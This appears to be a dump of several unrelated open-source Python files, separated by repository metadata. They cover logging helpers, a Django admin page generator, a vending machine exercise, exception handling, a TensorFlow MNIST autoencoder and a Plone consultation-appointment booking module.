youbi_list = ["月", "火", "水", "木", "金", "土", "日"]
youbi = youbi_list[now.weekday()]
format = f"%Y/%m/%d({youbi}) %H:%M:%S"
msg = now.strftime(format)
log.info(msg)
return msg
def ts():
global prev_ts
now = datetime.now()
prev = prev_ts or now
dif = now - prev
dif_us = dif.seconds * (10**6) + dif.microseconds
dif_str = f"{dif_us:+,d}us"
format = f"%Y/%m/%d %H:%M:%S,%f {dif_str:>15s}"
msg = now.strftime(format)
log.info(msg)
prev_ts = now
return msg
``` |
{
"source": "a24ma/msg2eml",
"score": 3
} |
#### File: msg2eml/logutil/helper.py
```python
import unicodedata
from logging import getLogger
from logging import StreamHandler
from logging import Formatter
from logging import NOTSET
from logging import DEBUG
def setup_logger(level=NOTSET):
logger = getLogger()
sh = StreamHandler()
formatter = Formatter('%(asctime)s [%(levelname)s] %(name)s > %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logger.setLevel(level)
sh.setLevel(level)
return logger
def diff_str(s1, s2):
w = unicodedata.east_asian_width
out1 = ""
out2 = ""
diff = ""
for cs in zip(s1, s2):
c1, c2 = cs
w1, w2 = (2 if w(c) in "WF" else 1 for c in cs)
if w1 == w2:
out1 += f"{c1}"
out2 += f"{c2}"
if c1 == c2:
diff += " "[:w1]
else:
out1 += f"[{ord(c1):04x}]"
out2 += f"[{ord(c2):04x}]"
diff += "^-"[:w1] + "------"
else:
out1 += f"{c1:{w2}}[{ord(c1):04x}]"
out2 += f"{c2:{w1}}[{ord(c2):04x}]"
diff += "^-------"
return out1, out2, diff
def out_diff(s1, s2):
return ("""
* s1: %s
* s2: %s
* diff: %s
""" % diff_str(s1, s2))
``` |
{
"source": "a24zlab/django-antd-tyadmin",
"score": 2
} |
#### File: tyadmin_api_cli/adapters/django_celery_beat_ty_admin.py
```python
from django.http import JsonResponse
from tyadmin_api.custom import MtyCustomExecView
class PeriodicTask_task(MtyCustomExecView):
def get(self, request, *args, **kwargs):
from django_celery_beat.admin import TaskSelectWidget
ret = {}
for one in TaskSelectWidget().choices:
if one[0] != "":
ret[one[0]]= one[1]
return JsonResponse(ret)
```
#### File: django-antd-tyadmin/tyadmin_api_cli/deal_antd_pages.py
```python
import os
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db.models import ForeignKey, CharField, DateTimeField, DateField, BooleanField, IntegerField, FloatField, FileField, ImageField, TextField
from tyadmin_api_cli.antd.constant import PASSWORD_UPDATE_FORM, UPDATE_PASSWORD_METHOD, PASSWORD_PLACE, PASSWORD_FORM
from tyadmin_api_cli.antd.field import *
from tyadmin_api_cli.adapters.field_adapter import FIELD_ADAPTER
from tyadmin_api_cli.contants import SYS_LABELS
from tyadmin_api_cli.fields import richTextField, SImageField
from tyadmin_api_cli import ty_admin_settings
from tyadmin_api_cli.utils import init_django_env, get_lower_case_name, trans
def adapter_priority(app_label, model_name, field_name, key):
try:
if key in FIELD_ADAPTER[app_label][model_name][field_name]:
return True
except KeyError:
return False
def style_adapter_priority(app_label, model_name, field_name, key):
try:
if key in settings.TY_ADMIN_CONFIG["REWRITE"][app_label][model_name][field_name]:
return True
except KeyError:
try:
if key in ty_admin_settings.TY_ADMIN_CONFIG["REWRITE"][app_label][model_name][field_name]:
return True
except KeyError:
return False
def gen_antd_pages(project_name_settings, user_label_list, focus_model=None, template_type="base"):
init_django_env(project_name_settings)
import django
from django.conf import settings
if not user_label_list:
user_label_list = settings.TY_ADMIN_CONFIG["GEN_APPS"]
try:
force_cover = settings.TY_ADMIN_CONFIG['FORCED_COVER']
except KeyError:
force_cover = False
gen_labels = SYS_LABELS + user_label_list
model_pic_dict = {}
model_date_dict = {}
model_service_dict = {}
user = get_user_model()
model_list = django.apps.apps.get_models()
for one in model_list:
columns = []
model_name = one._meta.model.__name__
model_ver_name = trans(one._meta.verbose_name_raw)
app_name = one._meta.app_label
model_meta = one.objects.model._meta
if focus_model and model_name != focus_model:
continue
if app_name in gen_labels:
img_field_list = []
date_row_list = []
model_add_item_list = []
model_many_to_many_list = []
model_import_item_list = []
model_service_item_list = []
date_field_list = []
fields_count = len(model_meta.fields)
# 处理字段类型
for field in model_meta.fields:
field_name = field.name
# 进行第三方Field重写,优先级高
try:
cur_adapter = FIELD_ADAPTER[app_name][model_name][field_name]
except KeyError:
cur_adapter = None
if cur_adapter and adapter_priority(app_name, model_name, field_name, "index_import"):
model_import_item_list.append(cur_adapter["index_import"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "effect_state"):
model_add_item_list.append(cur_adapter["effect_state"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "services"):
model_service_item_list.append(cur_adapter["services"])
if cur_adapter and adapter_priority(app_name, model_name, field_name, "field"):
current_field = cur_adapter["field"]
elif isinstance(field, ForeignKey):
associated_model = field.related_model._meta.object_name
current_field = Field_Template_Factory(field)
# print(current_field)
field_first_up = field_name[0].upper() + field_name[1:]
model_add_item = f"""
const [{field_name}ForeignKeyList, set{field_first_up}ForeignKeyList] = useState([]);
useEffect(() => {{
query{associated_model}({{all: 1}}).then(value => {{
set{field_first_up}ForeignKeyList(value);
}});
}}, []);
const [{field_name}VerboseNameMap, set{field_first_up}VerboseNameMap] = useState([]);
useEffect(() => {{
query{associated_model}VerboseName().then(value => {{
set{field_first_up}VerboseNameMap(value);
}});
}}, []);"""
model_add_item_list.append(model_add_item)
model_import_item = f"""import {{query{associated_model}, query{associated_model}VerboseName}} from '@/pages/AutoGenPage/{associated_model}List/service';"""
if model_import_item not in model_import_item_list and model_name != associated_model:
# 外键self 处理
model_import_item_list.append(model_import_item)
elif isinstance(field, CharField):
current_field = Field_Template_Factory(field)
elif isinstance(field, DateTimeField):
current_field = Field_Template_Factory(field)
date_field_list.append('"' + field_name + '"')
date_row_list.append(f'record.{field_name} = record.{field_name} === null ? record.{field_name} : moment(record.{field_name});')
elif isinstance(field, DateField):
current_field = Field_Template_Factory(field)
date_field_list.append('"' + field_name + '"')
date_row_list.append(f'record.{field_name} = record.{field_name} === null ? record.{field_name} : moment(record.{field_name});')
elif isinstance(field, BooleanField):
current_field = Field_Template_Factory(field)
elif isinstance(field, IntegerField):
current_field = Field_Template_Factory(field)
elif isinstance(field, FloatField):
current_field = Field_Template_Factory(field)
elif isinstance(field, ImageField) or isinstance(field, SImageField):
img_field_list.append('"' + field_name + '"')
current_field = Field_Template_Factory(field)
elif isinstance(field, FileField):
img_field_list.append('"' + field_name + '"')
current_field = Field_Template_Factory(field)
elif isinstance(field, TextField):
current_field = Field_Template_Factory(field)
elif field.__class__.__name__ == "UEditorField" or isinstance(field, richTextField):
current_field = Field_Template_Factory(field)
elif field.__class__.__name__ == "TimeZoneField":
current_field = Field_Template_Factory(field)
else:
current_field = Field_Template_Factory(field)
# print(current_field)
model_pic_dict[model_name] = img_field_list
model_date_dict[model_name] = date_field_list
columns.append(current_field)
model_service_dict[model_name] = model_service_item_list
# 处理多对多关系
for field in model_meta.many_to_many:
associated_model = field.related_model._meta.object_name
if style_adapter_priority(app_name, model_name, field.name, "many_to_many"):
try:
many_style = settings.TY_ADMIN_CONFIG["REWRITE"][app_name][model_name][field.name]["many_to_many"]
except KeyError:
many_style = ty_admin_settings.TY_ADMIN_CONFIG["REWRITE"][app_name][model_name][field.name]["many_to_many"]
else:
many_style = None
current_field = Field_Template_Factory(field, many=True, manyStyle=many_style)
field_name = field.name
field_first_up = field_name[0].upper() + field_name[1:]
model_many_to_many_item = f"""const [{field.name}ManyToManyList, set{field_first_up}ManyToManyList] = useState([]);
useEffect(() => {{
query{associated_model}({{all:1}}).then(value => {{
set{field_first_up}ManyToManyList(value);
}});
}}, []);"""
model_many_to_many_list.append(model_many_to_many_item)
model_import_item = f"""import {{query{associated_model}}} from '@/pages/AutoGenPage/{associated_model}List/service';"""
if model_import_item not in model_import_item_list and model_name != associated_model:
model_import_item_list.append(model_import_item)
columns.append(current_field)
if app_name == user._meta.app_label and model_name == user._meta.object_name:
opera = UserOptionColumn.replace(">>MODEL_NAME<<", model_ver_name)
else:
opera = GeneralOptionColumn.replace(">>MODEL_NAME<<", model_ver_name)
opera = opera.replace(">>TIME_DEAL_PLACEHOLDER<<", "".join(date_row_list))
columns.append(opera)
dest_path = f'{os.path.dirname(__file__)}/antd_page_templates/{template_type}'
with open(f'{dest_path}/index.jsx', encoding='utf-8') as fr:
content = fr.read()
if fields_count > 8:
new_content = content.replace(">>TWO_COLUMNS_COL<<", "twoColumns")
else:
new_content = content.replace(">>TWO_COLUMNS_COL<<", "{}")
new_content = new_content.replace(">>COLUMNS_LIST<<", "".join(columns))
new_content = new_content.replace(">>MODEL_NAME<<", model_name)
new_content = new_content.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
new_content = new_content.replace(">>FOREIGNKEY_PLACE<<", "".join(model_add_item_list))
new_content = new_content.replace(">>MANY_TO_MANY_PLACE<<", "".join(model_many_to_many_list))
new_content = new_content.replace(">>IMPORT_PLACE<<", "".join(model_import_item_list))
new_content = new_content.replace(">>TIME_PLACE<<", ",".join(model_date_dict[model_name]))
if app_name == user._meta.app_label and model_name == user._meta.object_name:
# 更新自己的密码
new_content = new_content.replace(">>PASSWORD_FORM<<", PASSWORD_FORM)
new_content = new_content.replace(">>PASSWORD_PLACE<<", PASSWORD_PLACE)
new_content = new_content.replace(">>UPDATE_PASSWORD_METHOD<<", UPDATE_PASSWORD_METHOD)
new_content = new_content.replace(">>PASSWORD_UPDATE_FORM<<", PASSWORD_UPDATE_FORM)
else:
new_content = new_content.replace(">>PASSWORD_FORM<<", "")
new_content = new_content.replace(">>PASSWORD_PLACE<<", '')
new_content = new_content.replace(">>UPDATE_PASSWORD_METHOD<<", '')
new_content = new_content.replace(">>PASSWORD_UPDATE_FORM<<", '')
with open(f'{dest_path}/service.js', encoding='utf-8') as fr:
content = fr.read()
new_services = content.replace(">>MODEL_NAME_LOWER_CASE<<", get_lower_case_name(model_name))
new_services = new_services.replace(">>MODEL_NAME<<", model_name)
new_services = new_services.replace(">>IMAGE_FIELD_LIST<<", ",".join(model_pic_dict[model_name]))
new_services = new_services.replace(">>ADAPTER_SERVICE<<", "\n".join(model_service_dict[model_name]))
if app_name == user._meta.app_label:
new_services = new_services.replace(">>UPDATE_PASSWORD_SERVICE<<", """
export async function updateUserPassword(params) {
return request('/api/xadmin/v1/list_change_password', {
method: 'POST',
data: { ...params},
});
}""")
else:
new_services = new_services.replace(">>UPDATE_PASSWORD_SERVICE<<", "")
with open(f'{dest_path}/components/CreateForm.jsx', encoding='utf-8') as fr:
create_form = fr.read()
create_form = create_form.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
if fields_count > 8:
create_form = create_form.replace(">>WIDTH_PLACEHOLDER<<", 'width={1200}')
else:
create_form = create_form.replace(">>WIDTH_PLACEHOLDER<<", "width={800}")
with open(f'{dest_path}/components/UpdateForm.jsx', encoding='utf-8') as fr:
update_form = fr.read()
update_form = update_form.replace(">>MODEL_VERBOSE_NAME<<", str(model_ver_name))
if fields_count > 8:
update_form = update_form.replace(">>WIDTH_PLACEHOLDER<<", 'width={1200}')
else:
update_form = update_form.replace(">>WIDTH_PLACEHOLDER<<", "width={800}")
with open(f'{dest_path}/components/UpdatePasswordForm.jsx', encoding='utf-8') as fr:
change_password_form = fr.read()
target_path = f'{settings.BASE_DIR}/tyadmin/src/pages/AutoGenPage'
cur_path = f'{target_path}/{model_name}List'
if not os.path.exists(cur_path):
os.makedirs(cur_path)
cur_path_co = f'{target_path}/{model_name}List/components'
if not os.path.exists(cur_path_co):
os.makedirs(cur_path_co)
index_jsx_path = f'{target_path}/{model_name}List/index.jsx'
if not force_cover and os.path.exists(index_jsx_path):
pass
else:
with open(index_jsx_path, 'w', encoding='utf-8') as fw:
fw.write(new_content)
service_jsx_path = f'{target_path}/{model_name}List/service.js'
if not force_cover and os.path.exists(service_jsx_path):
pass
else:
with open(service_jsx_path, 'w', encoding='utf-8') as fw:
fw.write(new_services)
create_form_path = f'{target_path}/{model_name}List/components/CreateForm.jsx'
if not force_cover and os.path.exists(create_form_path):
pass
else:
with open(create_form_path, 'w', encoding='utf-8') as fw:
fw.write(create_form)
update_form_path = f'{target_path}/{model_name}List/components/UpdateForm.jsx'
if not force_cover and os.path.exists(update_form_path):
pass
else:
with open(update_form_path, 'w', encoding='utf-8') as fw:
fw.write(update_form)
if app_name == user._meta.app_label:
update_password_form_path = f'{target_path}/{model_name}List/components/UpdatePasswordForm.jsx'
if not force_cover and os.path.exists(update_password_form_path):
pass
else:
with open(update_password_form_path, 'w', encoding='utf-8') as fw:
fw.write(change_password_form)
if __name__ == '__main__':
# settings_name = input("请输入项目settings位置:")
name = "tyadmin_demo.settings"
gen_antd_pages(name, None)
```
#### File: tyadmin_api_cli/tyadmin_api_init/utils.py
```python
import datetime
import time
import uuid
from tyadmin_api.models import TyAdminSysLog
def log_save(user, request, flag, message, log_type):
log = TyAdminSysLog(
user_name=user,
ip_addr=request.META['REMOTE_ADDR'],
action_flag=flag,
message=message,
log_type=log_type
)
log.save()
# encoding: utf-8
from random import Random
from django.conf import settings
from django.core.mail import EmailMessage
from tyadmin_api.models import TyAdminEmailVerifyRecord
def random_str(random_length=8):
str_base = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
random = Random()
for i in range(random_length):
str_base += chars[random.randint(0, length)]
return str_base
def send_email(email, send_type="login_auth"):
email_record = TyAdminEmailVerifyRecord()
if send_type == "login_auth":
code = random_str(4)
else:
code = random_str(16)
email_record.code = code
email_record.email = email
email_record.send_type = send_type
email_record.save()
if send_type == "login_auth":
email_title = "平台 邮箱登录验证码"
email_body = f"验证码为: {code}, 请在五分钟内填写!"
msg = EmailMessage(email_title, email_body, settings.EMAIL_FROM, [email])
msg.content_subtype = "html"
send_status = msg.send()
if send_status:
pass
def save_uploaded_file(f, to_path):
with open(to_path, 'wb+') as to_file:
for chunk in f.chunks():
to_file.write(chunk)
def gen_file_name(file_name):
today = datetime.date.today()
name = str(today) + "-" + str(uuid.uuid4()) + "-" + file_name
return name
if __name__ == '__main__':
gen_file_name("123")
``` |
{
"source": "a250/msai-python",
"score": 4
} |
#### File: msai-python/HA3-Zyablitsev/vend_machine.py
```python
class VENDMACHINE():
def __init__(self, init_state):
self.shelves = init_state['shelves']
self.account = init_state['account']
self.height = len(self.shelves)
self.width = len(self.shelves[0])
self.customer_account = init_state['customer_account']
def put_in(self, name: str, price: float, qty: int, x: int, y: int) -> bool:
if (y > self.height - 1) or (x > self.width - 1):
return False
if self.shelves[y][x] is None:
item = {'name': name, 'price': price, 'qty': qty}
self.shelves[y][x] = item
return True
else:
return False
def purchase(self, x: int, y: int) -> bool:
if (y > self.height - 1) or (x > self.width - 1): # if wrong x and y
print(f'wrong {x=}, {y=}')
return False
if self.shelves[y][x] is None: # if selected box is empty
print(f'box {x=},{y=} empty')
return False
if self.customer_account['cash_now'] < self.shelves[y][x]['price']: # if not enought money
print('not enoght money')
return False
self.customer_account['cash_now'] -= self.shelves[y][x]['price']
self.shelves[y][x]['qty'] -= 1
if self.shelves[y][x]['qty'] == 0:
self.shelves[y][x] = None
def add_money(self, cash_sum: float) -> float:
# print(f'putting ${cash_sum} money')
self.customer_account['cash_now'] += cash_sum
return self.customer_account['cash_now']
def take_moneyback(self) -> float:
self.customer_account['cash_now'] = 0
return True
def showcase(self):
for shelf in self.shelves:
shelf_view_1 = ''
shelf_view_2 = ''
shelf_view_3 = ''
for box in shelf:
if box is not None:
item = box.get('name')
price = '$' + str(box.get('price'))
qty = str(box.get('qty'))
info = price + ': x' + qty
separator = '|------------'
else:
item = 'none'
info = ''
shelf_view_1 += f' | {item: <10}'
shelf_view_2 += f' | {info: <10}'
shelf_view_3 += f' {separator:<10}'
print(shelf_view_1 + '|')
print(shelf_view_2 + '|')
print(shelf_view_3 + '|')
print(f'\nCustomer cash: ${self.customer_account["cash_now"]}')
if __name__ == '__main__':
vending_machine = {
'shelves': [[{'name': 'candy', 'price': 10, 'qty': 3},
{'name': 'bread', 'price': 8, 'qty': 5},
{'name': 'pepsi', 'price': 20, 'qty': 6},
{'name': 'milk', 'price': 7, 'qty': 4}],
[None, None, None, None],
[None, None, None, None]],
'account': {'total_sum': 1000.10, 'coins': {1: 10, 5: 15, 10: 23, 50: 12}},
'customer_account': {'state': 'selecting',
'cash_now': 15,
'choice': {'x': None, 'y': None}}
}
print('----\nHere is our Vending Machine\n\n')
VM = VENDMACHINE(vending_machine)
VM.showcase() # show initial state
print('----\nAdding money\n')
VM.add_money(3.5)
VM.showcase()
print('----\nPutting items inside\n')
VM.put_in('bread', 3, 2, 1, 1)
VM.showcase()
print('----\nDo purchase\n')
VM.purchase(1,1)
VM.showcase()
print('----\nGet money back\n')
VM.take_moneyback()
VM.showcase()
```
#### File: week15_exceptions_open_with/seminar/exception_learning.py
```python
import requests
try:
response = requests.get('https://goojdiudoeiwul3dgle.com/')
except (requests.ConnectionError, requests.Timeout):
print('ConnectionError happened')
raise # re raising caught exception
except requests.RequestException as e:
print(f'Something goes wrong in requests: {type(e)} {e}')
raise # re raising caught exception
else:
print(response)
finally:
print('Request handling is finished')
class StrListException(Exception):
def __init__(self, data=None, *args):
super().__init__(*args)
self.data = data
class WrongType(StrListException, TypeError):
pass
class WrongSize(StrListException, ValueError):
pass
class StrList:
"""
StrList is list-like container for strings.
"""
@classmethod
def _validate_state(cls, state: list[str] | None) -> list[str]:
if state is None:
return []
if not isinstance(state, list):
raise WrongType(f'state of {cls.__name__} must be list[str]')
for element in state:
if not isinstance(element, str):
raise WrongType(f'state of {cls.__name__} must be list[str]')
return state
@staticmethod
def _validate_str(element: str) -> str:
if not isinstance(element, str):
raise WrongType('element must be str')
return element
@staticmethod
def _validate_int(value: int) -> int:
if not isinstance(value, int):
raise WrongType('value must be int')
if value <= 0:
raise WrongSize('value must be positive integer')
return value
# ...
try:
StrList._validate_int(10)
except StrListException:
pass
``` |
{
"source": "a25765564/MLtest",
"score": 3
} |
#### File: a25765564/MLtest/mnist.py
```python
import numpy as np
import sklearn.preprocessing as prep
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
def xavier_init(fan_in,fan_out,constant = 1):
low = -constant * np.sqrt(6.0 /(fan_in + fan_out))
high = constant * np.sqrt(6.0 /(fan_in + fan_out))
return tf.random_uniform((fan_in,fan_out),minval= low,maxval = high,dtype = tf.float32)
class AdditivaGaussianNoiseAutoencoder(object):
def __init__(self,n_input,n_hidden,transfer_function= tf.nn.softplus,optimizer= tf.train.AdamOptimizer(),scale=0.1):
self.n_input = n_input
self.n_hidden = n_hidden
self.transfer = transfer_function
self.scale = tf.placeholder(tf.float32)
self.training_scale = scale
network_weights = self._initialize_weights()
self.weights = network_weights
self.x = tf.placeholder(tf.float32,[None,self.n_input])
self.hidden = self.transfer(tf.add(tf.matmul(self.x+scale * tf.random_normal((n_input,)),
self.weights['w1']),self.weights['b1']))
self.reconstruction = tf.add(tf.matmul(self.hidden,self.weights['w2']),self.weights['b2'])
self.cost = 0.5 * tf.reduce_sum(tf.pow(tf.subtract(self.reconstruction,self.x),2.0))
self.optimizer = optimizer.minimize(self.cost)
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
def _initialize_weights(self):
all_weights = dict()
all_weights['w1'] = tf.Variable(xavier_init(self.n_input,self.n_hidden))
all_weights['b1'] = tf.Variable(tf.zeros([self.n_hidden],dtype = tf.float32))
all_weights['w2'] = tf.Variable(tf.zeros([self.n_hidden,self.n_input],dtype = tf.float32))
all_weights['b2'] = tf.Variable(tf.zeros([self.n_input],dtype = tf.float32))
return all_weights
def partial_fit(self,X):
cost, opt = self.sess.run((self.cost,self.optimizer),feed_dict= {self.x:X,self.scale:self.training_scale})
return cost
def calc_total_cost(self,X):
return self.sess.run(self.cost,feed_dict={self.x:X,self.scale:self.training_scale})
def transform(self,X):
return self.sess.run(self.hidden,feed_dict={self.x:X,self.scale:self.training_scale})
def generate(self,hidden = None):
if hidden is none:
hidden = np.random.normal(size = self.weights["b1"])
return self.sess.run(self.reconstruction,feed_dict= {self.hidden:hidden})
def reconstruct(self,X):
return self.sess.run(self.reconstruction,feed_dict={self.x:X,self.scale:self.training_scale})
def getWeights(self):
return self.sess.run(self.weights['w1'])
def getBisses(self):
return self.sess.run(self.weights['b1'])
mnist = input_data.read_data_sets('MNIST_DATA',one_hot=True)
def standard_scale(X_train,X_test):
preprocessor = prep.StandardScaler().fit(X_train)
X_train = preprocessor.transform(X_train)
X_test = preprocessor.transform(X_test)
return X_train,X_test
def get_random_block_from_data(data,batch_size):
start_index = np.random.randint(0,len(data) - batch_size)
return data[start_index:(start_index + batch_size)]
X_tain,X_test = standard_scale(mnist.train.images,mnist.test.images)
n_samples = int(mnist.train.num_examples)
training_epochs = 200
batch_size = 128
display_step = 1
autoencoder = AdditivaGaussianNoiseAutoencoder(n_input = 784,n_hidden= 200,transfer_function = tf.nn.softplus,
optimizer = tf.train.AdamOptimizer(learning_rate = 0.001),
scale = 0.01)
for epoch in range(training_epochs):
avg_cost = 0.
total_batch = int(n_samples /batch_size)
for i in range(total_batch):
batch_xs = get_random_block_from_data(X_tain,batch_size)
cost = autoencoder.partial_fit(batch_xs)
avg_cost += cost /n_samples * batch_size
if epoch % display_step == 0:
print("Epoch:",'%04d'%(epoch+1),"cost=","{:.9f}".format(avg_cost))
print ("total cost:" + str(autoencoder.calc_total_cost(X_test)))
```
#### File: a25765564/MLtest/tf_classfication01.py
```python
import tensorflow as tf
import skimage
from skimage import data
import os
def load_data(data_directory):
directories = [d for d in os.listdir(data_directory)
if os.path.isdir(os.path.join(data_directory, d))]
labels = []
images = []
for d in directories:
label_directory = os.path.join(data_directory, d)
file_names = [os.path.join(label_directory, f)
for f in os.listdir(label_directory)
if f.endswith(".ppm")]
for f in file_names:
images.append(data.imread(f))
labels.append(int(d))
return images, labels
ROOT_PATH = "F:\\kaggle\\belgiumTSC"
train_data_directory = os.path.join(ROOT_PATH, "Training")
test_data_directory = os.path.join(ROOT_PATH, "Testing")
images, labels = load_data(train_data_directory)
#print the images dimensions
print(images.ndim)
#print the number of 'images'`s element
print(images.size)
images[0]
#show the plot
import matplotlib.pyplot as plt
plt.hist(labels,62)
plt.show()
``` |
{
"source": "a25kk/lra",
"score": 2
} |
#### File: lra/cos/appointments.py
```python
from lra.cos.interfaces import IConsultationAppointmentLocator, \
IConsultationAppointmentGenerator
from sqlalchemy import Table, func
from sqlalchemy import schema as sqlalchemy_schema
from sqlalchemy import types as sqlalchemy_types
from z3c.saconfig import Session
from zope import schema
from zope.interface import Interface, implementer
from lra.cos import ORMBase
from lra.cos import _
from zope.sqlalchemy import register
metadata = ORMBase.metadata
class IConsultationAppointment(Interface):
""" A consultation appointment """
consultationAppointmentId = schema.Int(
title=_(u"Consultation appointment identifier"),
)
consultationAppointmentCode = schema.TextLine(
title=_(u"Consultation appointment code"),
)
consultationSlotCode = schema.TextLine(
title=_(u"Consultation slot code"),
)
consultationAppointmentTimeStamp = schema.Datetime(
title=_(u"Consultation appointment generated time stamp"),
)
privacy_notice = schema.Bool(
title=_(u"Privacy notice accepted?"),
)
data_protection_notice = schema.Bool(
title=_(u"Date protection notice accepted?"),
)
consultationAppointmentContactEmail = schema.TextLine(
title=_(u"Consultation contact email"),
)
consultationAppointmentContactSalutation = schema.TextLine(
title=_(u"Consultation contact salutation"),
)
consultationAppointmentContactFirstName = schema.TextLine(
title=_(u"Consultation contact first name"),
)
consultationAppointmentContactLastName = schema.TextLine(
title=_(u"Consultation contact last name"),
)
consultationAppointmentConstructionYear = schema.TextLine(
title=_(u"Consultation appointment construction year"),
)
consultationAppointmentRequest = schema.Text(
title=_(u"Consultation appointment request"),
)
@implementer(IConsultationAppointment)
class ConsultationAppointment(ORMBase):
""" Database-backed implementation of IConsultationAppointment """
__tablename__ = 'consultation_appointment'
consultationAppointmentId = sqlalchemy_schema.Column(
sqlalchemy_types.Integer(),
primary_key=True,
autoincrement=True,
)
# Generated via secrets.token_hex
consultationAppointmentCode = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
# Generated via secrets.token_hex
consultationSlotCode = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
consultationAppointmentTimeStamp = sqlalchemy_schema.Column(
sqlalchemy_types.DateTime(),
nullable=False,
server_default=func.now()
)
privacy_notice = sqlalchemy_schema.Column(
sqlalchemy_types.Boolean(),
nullable=False,
)
data_protection_notice = sqlalchemy_schema.Column(
sqlalchemy_types.Boolean(),
nullable=False,
)
consultationAppointmentContactEmail = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactSalutation = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactFirstName = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentContactLastName = sqlalchemy_schema.Column(
sqlalchemy_types.String(120),
nullable=False,
)
consultationAppointmentConstructionYear = sqlalchemy_schema.Column(
sqlalchemy_types.String(64),
nullable=False,
)
consultationAppointmentRequest = sqlalchemy_schema.Column(
sqlalchemy_types.Text(),
nullable=False,
)
#consultation_appointment = Table('consultation_appointment', metadata)
@implementer(IConsultationAppointmentLocator)
class ConsultationAppointmentLocator(object):
""" Utility to locate available consultation slots """
@staticmethod
def available_appointments(from_date):
"""Return a list of all appointments for particular time slots
on the specified dates.
Returns a list of dictionaries with keys 'timeSlotCode', 'appointmentCode',
and 'email'.
"""
results = Session.query(ConsultationAppointment).filter(
ConsultationAppointment.showTime.after(from_date)
)
appointments = [dict(appointment_id=row.consutationAppointmentId,
consultation_slot_code=row.consultationSlotCode,
appointment_code=row.consultationAppointmentCode,
appointment_email=row.consultationAppointmentContactEmail
)
for row in results]
return appointments
@implementer(IConsultationAppointmentGenerator)
class ConsultationAppointmentGenerator(object):
""" Utility to generate new consultation slots """
def __call__(self, appointment_request):
"""Make a consultation appointment
"""
# Make sure the time slot is still available
# TODO: check for data validity
session = Session()
register(session)
session().add(appointment_request)
```
#### File: cos/browser/manager.py
```python
import datetime
import secrets
from dateutil.relativedelta import relativedelta
from Acquisition import aq_inner
from babel.dates import format_datetime
from lra.cos.consultationslots import ConsultationSlot
from lra.cos.interfaces import IConsultationSlotGenerator, TimeSlotGenerationError, \
IConsultationSlotLocator
from plone import api
from plone.autoform import directives
from plone.autoform.form import AutoExtensibleForm
from plone.protect.utils import addTokenToUrl
from plone.supermodel import model
from plone.z3cform.layout import FormWrapper
from Products.Five.browser import BrowserView
from z3c.form import button, form
from zope import schema
from zope.component import getUtility
from zope.interface import implementer
from zope.publisher.interfaces import IPublishTraverse
from plone.app.z3cform.widget import DatetimeFieldWidget
from zope.schema.interfaces import IVocabularyFactory
from lra.cos import _
def next_weekday(d, weekday):
days_ahead = weekday - d.weekday()
if days_ahead <= 0: # Target day already happened this week
days_ahead += 7
return d + datetime.timedelta(days_ahead)
def time_slot_date_default_value():
today = datetime.datetime.today()
next_thursday = next_weekday(today, 3)
return next_thursday
def time_slot_dates_until_default_value():
today = datetime.datetime.today()
next_thursday = next_weekday(today, 3)
return next_thursday + relativedelta(month=1)
class ManageTimeSlots(BrowserView):
""" Consulting schedule view """
@staticmethod
def is_editable():
editable = False
if not api.user.is_anonymous():
editable = True
return editable
def show_toolbar(self):
context = aq_inner(self.context)
display_toolbar = False
if self.is_editable():
# Explicitly check for permissions
current_user = api.user.get_current()
display_toolbar = api.user.has_permission(
"LRA Consultation Slots: Manage Slots", user=current_user, obj=context
)
return display_toolbar
@staticmethod
def stored_time_slots():
locator = getUtility(IConsultationSlotLocator)
from_date = datetime.datetime.now()
try:
stored_slots = locator.available_slots(from_date)
return stored_slots
except:
return list()
def has_available_time_slots(self):
return len(self.stored_time_slots()) > 0
def available_time_slots(self):
context = aq_inner(self.context)
stored_slots = self.stored_time_slots()
available_slots = list()
for time_slot in stored_slots:
booking_url = "{0}/@@book-appointment/{1}".format(
context.absolute_url(),
time_slot["slot_code"]
)
time_slot.update({
"slot_booking_url": booking_url,
"slot_start": self.timestamp(time_slot['slot_time']),
"slot_end": self.timestamp(time_slot['slot_time_end'])
})
available_slots.append(time_slot)
return available_slots
def rendered_widget(self):
context = aq_inner(self.context)
view_name = "@@content-widget-lra-consultation-schedule"
rendered_widget = context.restrictedTraverse(view_name)()
return rendered_widget
def timestamp(self, slot_date):
context = aq_inner(self.context)
date = slot_date
timestamp = {
'day': date.strftime("%d"),
'day_name': format_datetime(date, 'EEEE', locale='de'),
'month': date.strftime("%m"),
'month_name': format_datetime(date, 'MMMM', locale='de'),
'year': date.strftime("%Y"),
'hour': date.strftime('%H'),
'minute': date.strftime('%M'),
'time': date.strftime('%H.%M'),
'date': date
}
return timestamp
class ITimeSlotAddForm(model.Schema):
time_slot = schema.Datetime(
title=_(u"Consultation Date"),
description=_(u"Please enter a date for consultations on schedule"),
required=True,
defaultFactory=time_slot_date_default_value,
)
directives.widget("time_slot", DatetimeFieldWidget, pattern_options={"time": False})
time_slots_until = schema.Datetime(
title=_(u"Time Slot Creation Until (Optional)"),
description=_(u"Please enter a future date for iterative creation"),
required=False,
defaultFactory=time_slot_dates_until_default_value,
)
directives.widget(
"time_slots_until", DatetimeFieldWidget, pattern_options={"time": False}
)
time_slots_creation = schema.Bool(
title=_(u"Time Slot Creation"),
description=_(u"Enable automatic creation of time slots between the "
u"specified start and end days. When not activated slots "
u"will only be created for the specific consultation date."),
required=False,
default=False
)
@implementer(IPublishTraverse)
class TimeSlotAddForm(AutoExtensibleForm, form.Form):
"""This search form enables you to find users by specifying one or more
search criteria.
"""
